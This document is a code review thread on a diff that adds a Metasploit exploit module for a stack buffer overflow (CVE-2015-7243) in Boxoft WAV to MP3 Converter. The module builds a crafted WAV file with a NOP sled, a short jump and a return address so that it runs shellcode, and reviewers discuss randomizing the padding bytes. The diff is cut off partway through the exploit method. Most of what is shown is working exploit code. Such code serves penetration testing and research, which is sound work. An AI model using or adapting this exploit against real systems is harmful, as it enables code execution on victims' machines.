modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb

```diff
@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.
+       By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the application,
+       a buffer is overwritten, which allows for running shellcode.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Robbie Corley', # EDB POC
+                            'Shelby Pace'    # Metasploit Module
+                          ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7243' ],
+          [ 'EDB', '38035' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Boxoft WAV to MP3 Converter v1.1',
+            {
+              'Ret' => 0x0040144c
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 31 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('FILENAME', [true, 'File to write shellcode to', 'music.wav'])
+      ])
+  end
+
+  def exploit
+    file_payload = payload.encode
+
+    buf = make_fast_nops(4132)
+    buf << "\xeb\x06\x90\x90"       # nseh -- jump to shellcode
```

Comment:
Rather than hardcoding `\x90\x90`, this might or might not work :

```ruby
buf << "\xeb\x06" + rand_text_alpha(2, payload_badchars)
```

Reply:
FWIW, using `Msf::Exploit#rand_text_alpha` over `Rex::Text::rand_text_alpha` assumes `payload_badchars`.